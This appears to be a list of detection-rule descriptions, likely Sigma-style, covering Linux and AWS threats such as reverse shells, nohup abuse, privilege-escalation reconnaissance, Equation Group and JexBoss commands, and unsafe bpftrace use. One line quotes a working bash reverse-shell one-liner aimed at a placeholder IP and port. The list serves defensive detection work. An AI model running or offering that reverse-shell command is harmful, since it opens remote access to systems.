Detects changes to the EC2 instance startup script. The shell script will be executed as root/SYSTEM every time the specific instances are booted up.
Detects usage of nohup which could be leveraged by an attacker to keep a process running or break out from restricted environments
Detects suspicious interactive bash as a parent to rather uncommon child processes
Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')
Detects suspicious shell commands used in various exploit codes (see references)
Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation.
Detects suspicious shell commands used in various Equation Group scripts and tools
Detects suspicious command sequence that JexBoss
Detects relevant commands often related to malware or hacking activity
Detects suspicious shell commands or program code that may be executed or used in command line to establish a reverse shell
Detects the usage of the unsafe bpftrace option